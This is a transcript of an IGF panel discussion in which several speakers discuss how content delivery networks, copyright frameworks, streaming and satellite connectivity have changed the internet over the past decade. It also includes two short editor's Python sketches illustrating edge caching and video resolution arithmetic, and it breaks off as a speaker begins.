Content is right beside you. We’ve rebuilt the network using content distribution techniques to actually make sure that the content is there just in case you need it, across all the major markets of the internet. We’ve transformed a just-in-time model, pop, pop, pop, let me get the packet for you, into a just-in-case model where within a few miles or kilometers there are literally petabytes of content. Oddly enough, it’s not learned volumes of written data. It’s video. It’s all the other things we do. And then we’ve leveraged that infrastructure to actually provide real-time services such as this video conversation, where we’re actually talking not directly over the internet, but from data center to data center. So we’re now living in an entirely different internet. The role of the internet service provider is now local. The larger movement of data around the planet, oddly enough, has now been privatized. In essence, that’s no longer a public carriage function, but an attribute of the large-scale content data networks. And the role of how to publish content has changed enormously. The citizen publisher is now a customer of Azure, Akamai, or any of the other commercial service providers. So it’s changed where the money is. It’s changed where the content and focus of engineering is. And it’s actually changed the engineering and architecture of the internet. Why? Because as long as we can build it like this, it’s cheaper, it’s faster, and it meets the demands of literally billions of people every hour of the day. So yes, the last 10 years has been a wild ride. Thank you.
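[Editor’s illustration] Geoff’s contrast between the old just-in-time model and today’s just-in-case model can be sketched as a toy edge cache. This is a minimal sketch, not how any real CDN is implemented; the titles and latency figures are invented for the example.

```python
# Toy contrast of the two delivery models described above:
# "just-in-time" fetches from a distant origin on a cache miss,
# while "just-in-case" pre-positions popular content at an edge node
# before anyone asks for it.

ORIGIN_RTT_MS = 180   # hypothetical round trip to a distant origin server
EDGE_RTT_MS = 5       # hypothetical round trip to a nearby edge node

class EdgeCache:
    def __init__(self, prepositioned=()):
        # "just-in-case": popular titles are pushed to the edge in advance
        self.store = set(prepositioned)

    def fetch(self, title):
        if title in self.store:
            return EDGE_RTT_MS      # served locally from the edge
        self.store.add(title)       # cached on first miss ("just-in-time")
        return ORIGIN_RTT_MS

cache = EdgeCache(prepositioned={"popular-show-s01e01"})
latencies = [cache.fetch("popular-show-s01e01"),  # pre-positioned: fast
             cache.fetch("niche-documentary"),    # miss: slow origin fetch
             cache.fetch("niche-documentary")]    # now cached: fast
print(latencies)  # [5, 180, 5]
```

The point of the toy model is Geoff’s observation: pre-positioning turns almost every user request into a short local hop, which is what makes petabytes of nearby content cheaper and faster than long-haul carriage.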

Moderator:
That’s very helpful. One of the issues 10 years ago was the challenge between North and South. So is part of this equalization the rebuilding of the internet? And this is just an open question for you all: there was still this feeling of a division in where money was being spent on infrastructure. It’s still a bit of a challenge, but I think, and the point about mobile is a great one, that the mobile carriers and the ability to use the network, I think we’ve done some work on that. But are we still struggling with a North-South divide, or have we done a better job of making sure that everybody who wants to put content up on the internet, or watch content on the internet, now has the ability to do that with some level of device in their hand or in their presence? That’s an open question for any of you. No? I mean, it was a question 10 years ago. I’m thinking, have we done better? I gotta say, no one’s asked that question in years. So maybe that’s a measure that actually it’s not,

Glenn Deen:
nothing’s ever solved, but it’s no longer the hot button that all of us are talking about. As Geoff said, we’ve re-engineered the internet. Part of that has been to make it scale, and part of it is evolving it so that the way content creators can interact with it and use it has evolved. Is it ever perfect? It will never be perfect, and that’s good, because I like keeping a job doing this work, but we’ve had great progress.

Geoff Huston:
Should I relate an experience? Yep. Coming from India, one of the most dramatic rollouts in the last 10 years has been connecting up hundreds of millions of people across the entire Indian subcontinent. It’s an engineering feat. It’s truly a wonder of the last 10 years. But one of their major targets and major roles was to integrate content provision, those boxes that deliver the streaming data, inside their network. So this wasn’t a subcontinent pulling data from the rest of the world on demand. Largely, it was trying to contain the problem: feed the data in once, and then deliver the data to users many times. And the entire rollout actually had as much emphasis on the integration of content and service into those networks as it did on actually building the network infrastructure that connected the users. So we’re now seeing the network and content coupled more closely in terms of the service model we deliver, and that, for the internet, is a dramatic change in the way we do architecture, the way we do infrastructure, and, oddly enough, the way we pay for it as well. So big changes, yes.

Moderator:
Great. Konstantinos?

Konstantinos Komaitis:
So I think that the north-south conversation about content is really the conversation that we have been having about digital divides, right? Because in order to create content, you need to have connectivity. It’s as simple as that. I think that with the emergence of smartphones and the fact that everybody has really gone mobile, we are seeing more content creation, and, going back, you don’t need to ask permission to upload anything on the internet as long as you have access to the internet. And that’s why it is always important to go back to those very fundamental values of the internet and try to remember that the internet’s architecture overall is based on some very basic principles, and we always need to reflect on how the things that we’re doing, whether they’re technological things or policy things, also reflect those values as much as we can. Glenn mentioned permissionless innovation. He didn’t use those words, but he said, I can upload something without permission. And I know that this is a term that 10 years ago was, whoa, no one could really talk about it, because everybody was misinterpreting it. But right now, we’re at a place where we see the value of that principle. So it is very important to remember that. I do not have data, but I suspect that there is more content created in the global north, and the global south consumes more content than it creates. So there is a lot of work that needs to be done to create those networks, right, that are resilient enough and able to support content creation in those countries. So there is some sort of a chain reaction happening. We cannot really talk about how the global south is creating content if we don’t first have a conversation about how it is connected, and how meaningful this connectivity is, to use a term that the UN loves.

Moderator:
But that seems to be the case. I have a Brazilian brother-in-law, and he’s always introducing me to things that are highly entertaining; the Capybara song is my favorite thing right now. But that is actually just my use of my network to learn about things that are going on. It isn’t the technical feasibility challenge of the haves and the have-nots that I think we had 10 years ago. But you mentioned several things in your opening statement, and there’s your point that you can put anything up, but the question is, should we keep all these things up? And this is a technical, not so much a content-driven, conversation. But thoughts on, what do we do with the fact that everybody can put everything up all the time, yet you’ve found a way to kind of manage through challenges that 10 years ago were just a hard no, take it down? And now, because so many people are creators, they want to be in on this as well. They don’t want to be taken down. They want their content up, as the rest of the world does.

LANTERI Paolo:
So let me also add something about the North-South debate and the availability of content. I think in terms of creativity and cultural products, the North-South debate is a bit old. In terms of content creation, we have countries that are not considered as North, like Brazil, Cuba, like many countries in Asia that made a revolution out of their creative economy, like Indonesia, South Korea, and African countries. So there are countless examples of countries that cannot be considered North that are actually overflowing the world with their content. The best example: if you look at the charts all over the world for music streaming, who is leading? Latino music. That’s a fact, and it was enabled also by the technology. If you go to completely different sectors, publishing, education, news, those remain local content, high in demand, needed. And the technology is enabling all that. Beyond that, and I think Bertrand is in the room, so he may say something, the technology is also enabling things that were unthinkable 10 years ago, like serving the language diaspora. You get people, the Italian diaspora in the US, or the African diaspora everywhere, who get to access the super compelling, top-notch content produced in their home countries. And this is another extremely good story to tell. And there was some fear that it was going to affect cultural diversity, the fact that the channels were handled by a handful of people coming from the North. In certain instances, it may be the case, but there is a recent study about music charts all over the world, and in countries where people are not English speakers, like Korea, Japan, Italy, Sweden, the top charts are all national artists. So how did we do it? Copyright was only part of that solution, but if you got rid of copyright, that would never have happened. 
Because, and I go back to the first question, it depends which content we are talking about. Copyright applies both to my small cousin’s birthday video uploaded on YouTube and to your pictures walking around Kyoto; copyright is applicable. But it also needs to function when you put hundreds of millions of dollars into producing a blockbuster video game or a movie, or when you have to pay the salaries of the journalists who are informing the world about what’s happening. So copyright worked well in being flexible whenever we’re talking about UGC, not necessarily commercially created content, allowing you to do many things. But at the same time, it did well in continuing to incentivize and reward the investment behind professionally created content. That was a huge challenge 10 years ago. And there were many saying it needs to change because it’s not working for UGC. In fact, we are showing that it can work for both scenarios.

Moderator:
Geoff, I’m just checking in. Any additional comments on this conversation?

Geoff Huston:
Yes, so part of this issue is that we didn’t build the content network we have today in the way we had envisaged it. We had thought, basically 20, 25 years ago, of the citizen publisher. My website is as big as your website, even if your name is Rupert Murdoch or someone else. We were all able to create and publish our content as equals. That unfortunately never happened. What happened instead, oddly enough, is that as we transformed the internet with content and service, we empowered the intermediaries. We empowered the middle agents, the folk who aggregate and license this content and deliver it through content distribution networks. It is no surprise that Google has the size it does. It is no surprise that Akamai is a major player. These intermediaries are actually astonishingly powerful. And what they deliver, oddly enough, is a uniform product to a global market. And so while folks’ demand for content may reflect a rich cultural diversity and may honor various forms of copyright, and that’s true, underneath it all we’ve actually built a relatively weird distortion, where a small number of these content intermediaries are astonishingly powerful and astonishingly large, and they effectively dominate this entire industry. My own website, if I hadn’t put it into a content distribution network, would be in a lost, forlorn, and very dusty corner of the internet. I couldn’t get the market, the attention, the eyeballs, whatever, that we seem to want from this. And so in unleashing this enormous amount of content, we’ve also empowered a relatively small collection of intermediaries to assume a very dominant role of control in running and operating these content distribution systems. So there are winners and losers inside all of this. I think the underlying lesson is that the way things pan out never works according to anybody’s plan. What actually happens is that technology produces surprising solutions. 
And the amount of, I suppose, money and the ability of markets to respond has actually meant we’ve leapt very quickly on solutions that work and then transform the industry every time. Moore’s law changes the dynamics of computing and storage every two years. The industry reinvents itself every five. There’s no constancy inside this industry. Any business plan that’s five years old is not a business plan anymore. It’s a historical archive. That’s not going to stop anytime soon. So yes, this is a very live area and demands an extraordinary amount of business agility and risk to play in this game.

Moderator:
Thanks. You brought up both sports and gaming, which we haven’t gotten into, which it seems to me have gotten to be a much broader worldwide audience than we might’ve had 10 years ago. Is that correct?

LANTERI Paolo:
Absolutely. I think those are areas where we see constant growth in terms of demand and supply, and where there is also busy activity by policymakers to make sure that the people investing their money in getting people to watch games and play video games around the world are safe. And it’s very much linked to what was just mentioned about the power of intermediaries. I thought at some point someone was going to say that copyright is the reason why everything is centralized. In fact, it’s not. It’s one of the few areas of law that is standing in the middle. And that is called internet service provider liability, or responsibility rules, safe harbors, which are still keeping countries all over the world busy. In this forum, those policies have been seen as the ultimate evil, but in fact they are the only way you can actually give control to the producer of the content instead of the distributor of the content. And we also saw another trend: in many instances there is no more demarcation between producer and distributor. Netflix, they do both themselves. So it’s partially true. Video games: huge, wonderful stories to tell. In those 10 years, their business model shifted completely from a console, hardware-based business to mostly online, global, interactive gaming. All covered, and it’s an IP-intensive industry. Video games are IP, not only copyright, of course. Growing fast, over 2 billion, 200 billion US dollars projected for this year. Meaning that, depending how you count it, it’s larger than audiovisual and/or music, sometimes put together. And it’s a wonderful story. No one is complaining about it, and IP was behind it. Sports is a big, big, complex debate. We had the WTO ruling on that. It’s part of copyright in the sense that it’s related to copyright. It’s not creative content as such, but there are rights accorded to broadcasters, or to the people organizing events, to control who is getting access to it. 
And it has more money involved than the traditional copyright industries.

Moderator:
Going to almost zero latency in many places. People always talk about Korea, right? That was the reason gaming was so big there, because it really felt like you were 100% interactive in the moment. So more places being able to come as close to zero latency as possible, I imagine, has really helped that entire environment as well. And yeah, absolutely.

LANTERI Paolo:
Technology enabled all that, and that’s what I forgot to mention: all these huge and fantastic deals that can be carefully crafted in meeting rooms with lawyers and business people, at the end of the day, nowadays, they count for nothing unless you have engineers to make it happen. And not only in terms of users, but even in making sure the revenues are shared and people are identified, you need technology. And that is, of course, from both sides. We are nothing without engineers.

Moderator:
We didn’t talk about the COVID effect, the fact that all the transit changed in its location, and yet it didn’t seem to cause any real problems. So first responders, engineers, we should give you guys more beer in places and say thank you.

Glenn Deen:
Gosh, that’s a lot of interesting stuff. I’d like to bring all these thoughts from Paolo and Geoff together here and talk about today and the unique things that are going on now that weren’t 10 years ago. So in some ways, as we’ve said, I can describe myself as a marriage counselor. I like to say that I do IP so that you can do IP. I do IP networks, you do IP frameworks. But we both work in the world of IP. And that’s kind of remarkable if you think about it. When I started doing this job about 10 years ago, and I came to my very first IGF and started participating actively at the IETF, a lot of people said, well, you’re from a movie studio. What are you doing here? I mean, why? 10 years later, that’s not even a question. I was here at the IGF downstairs; Sony, I think it’s their online entertainment, their games division, is downstairs with a booth at the IGF, showing a technical solution for how they delivered game updates during COVID and how they completely re-engineered how they did that, so that when people were home and wanted to play games, they could get the games and they could get the updates they needed. It was wonderful. Nobody even questions anymore why a content guy is at the IGF or a content guy is at the IETF. And I think that’s the really positive aspect of this progression we’ve seen. We brought the IP frameworks and the IP networking together. That enabled a platform for the business people that pay the bills, that pay for me to do my work and everybody else to do their stuff, to get comfortable with the internet as the platform for their next generation, right? Streaming. And that has caused an evolution that we could only have dreamt of back in the day. And what I mean by that specifically: if you look back to 2012, most video on the internet was either standard def or lower quality. 
It was 320 by 280; it was really terrible quality video. We went from standard def to HD, and now 4K is common on the internet. Each of those jumps is easy to state: it’s four times the amount of data. SD to HD is four times the amount of data; SD to 4K, 16 times the amount of data. NHK even has a higher-resolution service. And what’s enabled that is that the business of content creation and content distribution came to the party and said, this is important. They invested the funds, they invested the engineers, in advancing those fields, so that our codecs are much more efficient than they were in the past, and our network transports have much lower latency. Ten years ago we never talked about latency; it was just a thing we lived with. Now, at places like the IETF, it’s one of the things we talk about the most. There’s L4S at the IETF, which is an initiative for lower latency. And if people say, well, what do you do in your marriage counseling business today, what’s your number one thing? Latency is the thing I’m working on big time, because live sports, and sports brings people together. It isn’t just watching live sports; it’s sitting in the stadium and being able to chat with your friends on your phone while you’re watching the game. The friends may be at home watching on TV. I literally had the experience of being in the stands, and a friend texted me and said, just say hi on camera. And he was sitting at home and we were waving to each other. That’s cool. I mean, I couldn’t even imagine doing that ten years ago. But I’m going to come off as, sort of, isn’t this all wonderful? I think it is really wonderful. We’ve had an investment that made problems that we were afraid of go away. And it’s opened new things that are interesting challenges to work on, like the latency problem. That’s really fascinating. And we continue to evolve. 
I find that very exciting because it means that, you know, we’re not done. We’re continuing to find interesting things to work on. But at the end of the day, IP networks and IP frameworks, we work together in harmony. Not always, not always perfectly, but we work together to enable the business guys to go off and do their thing. Now, we sometimes say we don’t like what they’ve done. I myself will never appear in a TikTok video, but, you know.
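[Editor’s illustration] Glenn’s “four times the amount of data” figures follow from simple pixel arithmetic: each step doubles both the width and the height of the frame, so the raw pixel count, and roughly the uncompressed data rate, quadruples per step. A quick sketch; the SD-class frame size used here (960x540, a quarter of 1080p) is an illustrative choice, since real SD broadcast formats vary, and actual bitrates also depend heavily on codec efficiency.

```python
def pixels(width, height):
    # Raw pixel count per frame; uncompressed data rate scales with this.
    return width * height

sd  = pixels(960, 540)     # illustrative SD-class frame (quarter of 1080p)
hd  = pixels(1920, 1080)   # full HD: both dimensions doubled vs. SD
uhd = pixels(3840, 2160)   # 4K/UHD: both dimensions doubled again

print(hd // sd, uhd // sd)  # 4 16
```

So SD to HD is one doubling of each dimension (4x the pixels), and SD to 4K is two doublings (16x), which is where the jumps in data volume come from even before codec gains are counted.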

Moderator:
Konstantinos, you have a comment on this topic?

Konstantinos Komaitis:
Yeah, just very quickly. As both Paolo and Glenn were talking, I was thinking that effectively all of us, speaking at the IETF or working at the IETF, or working at WIPO, and thinking of these things: ultimately, it’s all about the user, right? Everyone is working for the user. And I think that what is interesting in the past 10 years is that the user really took us in the direction that they wanted. Very much indirectly and silently, in many ways, they said, we need those things in order to be able to participate and continue participating in the Internet. We need better networks, because we want these networks to be able to stream video as I walk through downtown Tokyo. We need better policy frameworks, because the licensing regime in copyright has created problems: when I’m traveling, I cannot take the content with me or keep access to that content. So we’re seeing also this change in the way those policy frameworks think about those things. So for me, it’s really interesting that we always need to go back. And one of the things that I have realized in doing this and thinking about the Internet is that ultimately it always comes down to the user. So it is very, very important in those conversations not to forget the users and what they want, and not to underestimate where they can take us. Because we are where we are, with all these new technologies and exciting things happening, whether it’s streaming or whatever, because of the users.

Audience:
Jim, did you have one? Yeah, thanks, Shane. So we actually have a comment and question from Kat Townsend from the Measurement Lab: 2.6 billion people are not online, and more do not have meaningful connectivity. Access is still very much an essential concern. We work on measuring the quality of connectivity at interconnection points and using those measurements to support increases in services and infrastructure development in underserved areas. How might we do this better, even without reporting from service providers?

Moderator:
Who would like to go first? Geoff, thoughts? Do you want to jump in on this?

Geoff Huston:
Yes, I have some modest thoughts here. Part of this is that the beauty of markets is also a weakness. We transformed this industry from one that was orchestrated from the middle out, which is where the telephone system was: the telephone company defined what the service was and how it was provided, and oddly enough, one of the defining instruments of that whole regime was universality of service and access. That goes back over 120 years. Everybody had universal service. It was echoed in electricity rollouts 10 years later. The internet was never built like that. It was built as a market response. It actually unleashed that stolid, quite conservative view from telephony into one that chased where users spent money. Now, the problem, as we all find with this, is that the richer the user, the more determined the chase for their money. Rich markets are extensively served with extraordinary amounts of technology. The hope, amongst much of this industry, is that as the technology improves, it gets cheaper and more accessible to those areas with lower per capita GDP and similar metrics. Ultimately, wiring out high-speed networks in remote and impoverished areas demands a level of capital intensity which is challenging for any investor. Interestingly, unorthodox solutions are appearing, and I've certainly been tracking where Starlink is going with its service. All of a sudden, over every part of the sea and land on this planet, we can drop in excess of 50 to 60 megabits per second anywhere, at prices which are not eye-watering, which currently are affordable in a Western context, and which, if the pace of technology keeps going, would be affordable universally. Because once connectivity is an abundant good, not a restricted and scarce good, everything changes. We fall into a trap of assuming the world we have today is constant. The silicon folk take an entirely different view: everything doubles in two to three years.
Stuff gets cheaper, stuff gets smaller, and stuff gets faster, and so the situation we find today will certainly change over the next few years. I suspect that one of the enabling technologies will be space-based, to get over some of these issues with the extraordinary amount of capital intensity required to wire up those parts of the rural and remote world that the existing technology models won't service. I applaud an initiative in Mongolia, which certainly has a large amount of extremely remote and sparsely populated territory, that is actually running a service based on Starlink to provide modern, extremely high-speed connectivity to astonishingly isolated and remote communities who don't have extensive power. This is all battery power, and it works. So certainly I am optimistic about being able to drop the threshold into more challenging markets, and certainly I see the technology shifts as essential to do that, because the existing models won't carry us into those spaces. But, you know, it's an evolving picture. So I'm optimistic.

Moderator:
That's very helpful. I think Project Kuiper launched two satellites this past week, and I know they're planning a huge constellation. So is this just a case of expecting to see more coverage, and eventually a lowering of the price point? Now that we've proven it works in Mongolia, you can probably go almost anywhere, not necessarily by pulling wire, but by using the spectrum that we have in space?

Geoff Huston:
There are five massive projects that are certainly on the drawing boards and in various stages of sophistication. So yes, Project Kuiper, the existing O3b, a Chinese project that's on the drawing boards, and of course Starlink. The launch costs are coming down, and because the launch costs are coming down, we're contemplating an entirely different future now in this area, particularly for the rural and remote. For countries like even Australia and New Zealand, which are marked by large amounts of sparsely inhabited territory, these kinds of technologies make an astonishing difference to the picture of a national community drawn together through a digital medium. So yes, I am less concerned at this point about the situation we have with the remaining 2.6 billion. I don't think it's intractable. I do believe that over the coming few years, technology solutions will apply to their part of the world as much as to ours, the developed part of the world.

Moderator:
I always wonder if there's going to be somebody, like Belize 10 years ago, who would say, come to Belize, we're not connected. So you'd want to vacation someplace where you can say, don't talk to me for five days. I'm going to come over here to Stella. You are studying a lot of this, and one of the things you mentioned when we were talking at the very beginning is that it's interesting being here in Japan, because Southeast Asia, the part of the world you are from, looks to Japan for a lot of the copyright laws and IP laws that you're currently studying. So talk about that. And also, you're a digital native. You really grew up with this. So a lot of this might seem like a bunch of wire talk, because it's always been there for you.

Stella Anne Ming Hui Teoh:
Thank you for the question. Actually, I just want to hop back a little bit to the topic of the global North-South divide. One of the issues we saw during the COVID pandemic was that, yes, network access may be important and prioritized, but one of the key barriers was the cost of devices. In Malaysia, for example, in the bottom 40 percent of the population, you would see one household sharing one device, and it becomes a matter of prioritizing who gets to use that device and who ultimately gets that access. That relates to what we're discussing for youth on the more privileged side, those who have their own devices. One of the worries we have regarding content, open access content, and fair use of content is that a lot of youths may start out as content creators with fan-related content, fan-created art, fan-created videos, et cetera, and I would like to ask the panel later for their thoughts on the future of that. And then on the topic of IP, one of the things we also see is that, as youth creators, some of the things we create and share online get fed into the algorithms. The worry is that later on, our work, or the work of those involved in that community, will be used to feed a larger program, and we won't get the credit, and we will ultimately just have to fade away and choose a different thing to do. So yes, if there are any thoughts on the youth role and youth presence, especially in terms of fan-created art and fan-related content.

LANTERI Paolo:
I'm extremely surprised to hear these comments. It's the first time the youth component of the IGF is actually calling for better copyright protection, to make sure their work is not going to be used to train machines, or get lost, and that attribution of their work is granted. Well, on paper, everything should work. It's settled. You have rights in 181 countries of the world, so practically all countries of the world, that assure you the right of being recognized and attributed as the author of a work, and you cannot waive it. While you can renounce exercising it, you cannot transfer it to your employer. That's the moral right. Then the real question is, how do you make sure this actually happens? Again, we have to turn to technologists. There are watermarking technologies, and there is protection of rights management information enshrined in copyright laws, which are there exactly to serve the purpose you are mentioning. Anything else would be way too technical, but the law is already there, and so is the technology. There is a huge debate, and it's not about youth; it's about all sorts of professional content creators. They don't want to see their content used to train machines that would eventually produce output that competes with them. Think about being a professional composer, or a journalist. But that's not specific to youth, and this IGF is devoting, I guess, 80% of its meeting time to that debate. The first question, about fan art, is part of the UGC debate. It's oftentimes derivative work. So if it's done in the context of platforms like TikTok, Instagram, or Meta's Facebook, those practices are often covered and regulated by the terms of use, taking copyright into account. So in certain frameworks this is solved by terms of use and licensing practices, and that's something that didn't happen in the past. 
Outside of those platforms, if you create something based on someone else's creation with a commercial purpose, I have bad news: you need to go and get permission. But there are clearinghouses. There are collective management organizations where you go to one place and get the right to do that.

Moderator:
So my understanding is that it's about having tool sets built into the platform you choose to put your content on, so you don't have to do it from scratch. It's like the old days you were mentioning, Geoff, with your blog, having to make sure it gets to the right place. When you're doing this, having those tools will help you protect your work from the beginning.

LANTERI Paolo:
So, very practically, and I don't know for sure because I'm not using TikTok, but if you do something on TikTok and you pick a soundtrack, it's identified. And part of the money that TikTok generates through advertisement, or through their business model, goes through a collective management organization to the owner of the song you are using in your video, so that you can do this without infringing copyright. But that's within the TikTok framework. If you take that video and broadcast it on TV, no, you can't do it; you would have to get the rights. So it's extremely complex. But frankly, there is meaningful progress in this space. If you ask rights holders, they would say the money received from those platforms is too low, it's not enough. But that's a business discussion, supported by some principles established in the norms.

Moderator:
Did you have a second question you want to add?

Stella Anne Ming Hui Teoh:
Actually, yes. It's related, but I'm not sure if it was already covered. On the topic of the language barrier: as you said, we digital natives have a strong online presence, and during COVID there was an opportunity for a lot of us to connect, if we had the means to connect online. What we saw was that certain books or comics, for example, are not available in the native language. What happens is that people offer to translate that particular piece of work, but it's not an official translation, and then they monetize it. So I think it's odd to see a youth creator who wants their own IP protected but is also actively engaging in that kind of activity, essentially taking someone else's work and translating it. Any thoughts on that issue?

LANTERI Paolo:
So it can be a new market. The first question I have for you: are we talking about human translations, or about someone offering to take a text and put it into DeepL or ChatGPT to translate it? Actually, both. Well, it's pretty different. Anyway, from a legal perspective, if you take a book and want to translate it into a language in which that book is not yet offered, you can't just do it. You have to ask for permission. Oftentimes, whether a version exists depends on the specific market, because that would be literature. How would you go about translating a movie? That would be dubbing, a completely different story. How would you do that for music? So for literature, there are practices for doing this, but translation of literature is still managed individually. If it's done by a human, then that translation is a derivative work, it is protected, and you can make money out of it. So go on, do it. That's how you expand and spread knowledge around the world. There is a need for that, but it cannot be done without getting permission.

Moderator:
All right, we've done our first hour. Good job, everybody. I am going to open this to questions, and I appreciate that we have people here in the room. Thank you for joining us up here at the large dais. Do you have something online as well, Jim? No? Okay. Petra, how are you this morning? Do you want to join in on this conversation? Okay, thanks.

Online Moderator:
Thank you very much, Shane. Fascinating discussion, a wealth of perspectives. As somebody who works for the professional audiovisual sector, the first thing I would say is that I agree with what I've heard about the false prophecies of 10 years ago, whereby copyright was going to break the internet. It's refreshing to hear that there's a fair degree of consensus that it hasn't. In fact, in our observation of the milieu of professional audiovisual production, one of the hopeful stories in terms of capacity building in the last decade has been the eagerness and success with which young producers in certain areas of the global South have accessed the copyright framework, mastered the knowledge they needed to support their activities of professional content production, and tried to build IP value within their companies, which, I remind people here, is essential in order to have basic access to the capital you require to pay your employees and to develop the next piece of content. We have a very complex product cycle. In audiovisual, it takes months, sometimes years, to develop a project to the point where it can go into production. This accessing of the copyright framework has proven a boon to content that ultimately ends up on internet services, and it has, I think, been conclusively proven that the two systems are meant for each other. The thing I would say, without meaning to rain on anyone's parade, is that the very upbeat story we heard from Geoff in particular, which is indeed very positive, is not always borne out by circumstances on the ground. I participate in a network called the Policy Network on Meaningful Access. We have a session tomorrow afternoon, I think at 3:15. I will be hearing in particular from two women who run a production company in Kampala, Uganda. They've been trying to run a sustainable audiovisual production company in this neck of the woods for a while, and it's proven quite complex.
One of the reasons is that in certain parts of Africa, countries have jumped a technological paradigm: where you would have had a more complex value chain for audiovisual output in the past, you now basically rely on internet services to pre-buy or buy your content in order to reach your public and satisfy consumer demand. These people play a crucial role because they're making local content in local languages. Luganda may be spoken by 25 million people or more, but in terms of its non-participation in economic globalisation, it is still a minority language. Therefore, if it's not spoken, if it's not used to reflect people's lives back at them, it's going to disappear or become marginalised. So the work they do on the ground is essential in the contribution it makes to maintaining linguistic diversity and cultural diversity. The trouble they have, very often, is that the content they make is vulnerable to market failure, and if they cannot find a buyer in the streaming environment, they are left with a very problematic situation. One of the things they observe on the ground also is that the pricing points of the mobile broadband services consumers and citizens have access to are not always adequate to the spending power of local people. If you need to spend seven gigs of the eight-gig bundle you've pre-purchased, and you've run out of data by the time you reach episode two of a series, something is not quite working in the match between supply and demand in this area. Also, the quality and reliability of the signal is often problematic. So, back to perhaps what Konstantinos was saying: it really is important to continue the work of deploying reliable infrastructure, with a variety of pricing points that reflect local purchasing power, to enable the making of content that is culturally relevant.
These people have recently made a film about a neurodivergent kid growing up in a traditional village in Uganda, subject to the prejudices of his milieu, and they regard their mission as one of educating and engaging people on women's issues, educational issues, and so on. If they don't have a sustainable model to do it, then something is not quite working.

Moderator:
So, stay with the microphone there, because you brought up a very interesting point on the economics and the challenges. At the very beginning of the internet, there was this hope that we were democratizing, and that people would be able to find each other anywhere very easily. Part of our challenge now is the societal bubbles we live in: the algorithm kind of repeats what we want to see over and over again. So in a case like this, I might want to watch this Ugandan content, but I didn't know it existed until now. How do they break through that barrier? It isn't just a network issue; it's also about finding out that it's there and getting it out into the wild.

Online Moderator:
Well, first of all, there is good news. I can't remember who, I think Geoff, made the point, which I think is a point of contention, that there's a tendency of concentration in the marketplace for services. I sort of beg to differ: it's not so intense that there isn't competition arising. In fact, the rollout of the large American streamers in some of these markets has often triggered a dynamic response, with local services arising to balance the equation. So these two ladies are finding, and we'll talk about it tomorrow, that their situation has improved compared to five years ago. They have more markets they can go to to try to persuade someone to put money up front so that they can make the content in the first place. But it remains at quite an early stage of development, and I think we need to see more competition in the type of service. There are two things that are really important here. One is that we talk a lot about UGC, and we respect UGC and the forms of licensing for UGC; as we've heard, it's a very important part of the creative ecosystem. But damn it, it's also a career for people. It's a professional career, and why not? Why could you not build sustainable audiovisual production businesses at an SME level, in the tier where you can be nimble, address different market segments, make a living, and pay your employees? That is a very important notion to the people on the ground who are actually trying to create career tracks based on the delivery of this type of content, based on living there and having their fingers on the cultural and socioeconomic pulse.

Glenn Deen:
Thank you. So, Bertrand, I really liked the point you made about the markets; it made me think. To Konstantinos's point that we've always said we build the internet for users, that's a truism. But it made me reflect that one thing that is also true is that who that user is, the one we build the internet for, has evolved and changed. When I started my career many years ago, that user at the other end was probably another computer scientist like myself. Now it's everybody. It's creators and it's the market, the people participating in the markets. These markets are built around the frameworks we've created and enabled through the technology. But the users are a much more sophisticated, very diverse entity now, right? It's the viewer, it's the creator, it's the creators who are also viewers. But it's these markets, at the end of the day, that are enabling the next generation, the next evolution of where we're going. Because the market enables people to exchange and to get paid for it. And that brings us back to the IP frameworks: the IP networks enable the IP frameworks, which enable the markets for all of us to participate in. I used to go around saying everybody's a creator, and I think I'm going to go back to saying it, because I think it's still true. Everybody is a creator. But the difference now may be that they're starting to get paid for it.

Geoff Huston:
But there's a fundamental point here, Glenn, that I think marks a shift in thinking in this digital world. The auto industry scaled up by making one car, one colour, one artefact. They scaled by uniformity. The telephone system scaled to reach an astonishing number of people with one product, one concept. So scale and uniformity went hand in hand, and I think we've grown into thinking that a market the size of billions means a product the size of one. But what we're actually finding, and you can see it best, I think, in digital advertising networks, oddly enough, is that we are able to scale to billions yet customise to a market of one. And if you think about how I can use a distributor like Netflix for my Ugandan-language video, there is a conversation that works for both producer and distributor. What we're finding in this digital world is that the power of the platform allows astonishingly fine-grained customisation of individual markets inside this larger ecosystem. So you can have any colour you want; we don't care. We can produce the artefact at an affordable price across a highly diverse market of billions, and actually create sustainable businesses supplying that system across the entire world. It is a different way of thinking, and I'm personally quite optimistic about it. It's no longer one car, one size, one thing. It is a market where we can be highly diverse and highly customisable inside one framework. That's what we're exploring right now, and I think we'll explore over the next five or so years. And oddly enough, things like copyright really help, because all of a sudden these authors and producers can say, I'm a market of one with my copyright, and the distributor goes, sure, I can accommodate that within the frameworks we have that serve billions of people. This is where we're heading with this technology. It is amazing stuff, I believe.

Moderator:
Thanks for that. Anyone else on the panel want to comment on that and then we’ll go to another question. Hi. Microphone.

LANTERI Paolo:
About the market discussion, I think there is a point that was never raised. I only mentioned that there are different stakeholders in the value chain, with different positions. There are no front-line artists here in the room or on the panel, so I need to highlight the fact that we're talking about an extremely positive situation. The focus of our debate has been the larger picture, the IP system versus the development of the internet, and what the impact is on content production and access. That picture is extremely positive. However, in all this debate, if you talk to musicians or artists, sometimes they don't feel well treated, and from digital exploitation they don't get the money they think they deserve, or that they were used to getting from traditional media. This is a fact; it's debated, it's discussed, there are people negotiating it. I think it's mostly a matter of bargaining power and deal-by-deal negotiation. The trend is positive, but there is discussion out there. One question we ask, those of us involved with policy rather than business deals: if I'm not mistaken, and I haven't checked, I think 13 years ago the subscription fee of certain streaming services was exactly the same as today. No? I don't want to quote figures specifically, but my sense is that the price has stabilized, a little bit up, certainly not at the pace of inflation. But on the other hand, the content you get has certainly increased, so you have double. So is it sustainable? We have more product, more content, more stakeholders, and the same or almost the same price. How far can that model go? I leave it there; it's a question, and I don't have the answer.

Konstantinos Komaitis:
Just very quickly, I think this is a competition issue, right? I mean, the market will sort it out. We are already seeing some services survive and some services die a quick death, as in the case of Quibi, for instance. So I think we're going to go through a phase, and I feel we are already in the phase of a hype where everyone wants to do streaming because it's the new golden thing. Then some players will survive and some won't, and content will play the predominant role in determining which ones survive, as well as the engineering behind it, and whether you are able to support what you're selling me and want me to buy.

Moderator:
Did you want to comment on just how much content is being produced? We were talking about this the other day. It's just amazing.

Glenn Deen:
